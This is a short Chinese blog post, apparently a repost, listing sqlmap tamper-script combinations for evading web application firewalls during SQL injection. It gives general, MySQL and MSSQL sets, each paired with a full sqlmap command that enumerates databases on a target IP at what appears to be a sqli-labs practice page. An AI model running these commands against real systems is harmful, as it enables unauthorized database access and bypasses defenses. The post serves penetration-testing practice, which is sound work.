zoukankan      html  css  js  c++  java

  • sqlmap tamper懒人使用技巧

    sqlmap tamper懒人使用技巧

    测试了下,不是太靠谱,大家可以根据实际情况测试一下

    普通绕过
    tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

    python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --proxy="http://127.0.0.1:8080" -batch

    MySQL数据库一把索绕过
    tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

    python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --proxy="http://127.0.0.1:8080" -batch

    MSSQL数据库一把索绕过
    tamper=between,charencode,charunicodeencode,greatest,multiplespaces,percentage,randomcase,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

    python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper=between,charencode,charunicodeencode,greatest,multiplespaces,percentage,randomcase,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --proxy="http://127.0.0.1:8080" -batch

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    31 整数中1出现的次数(从1到n整数中1出现的次数)
    算法寒假实习面试经过之 十一贝(offer) 联想研究院(电话一面 被拒)
    百度feed 寒假实习 一面二面(offer)
    30连续子数组的最大和
    29最小的K个数
    28数组中出现次数超过一半的数字
    MySQL操作数据库和表的基本语句(DDL)
    Oracle————存储过程与函数
    Oracle清空数据库中数据表数据的方法
    Linux之常用Shell脚本总结
  • 原文地址:https://www.cnblogs.com/autopwn/p/13631923.html
Copyright © 2011-2022 走看看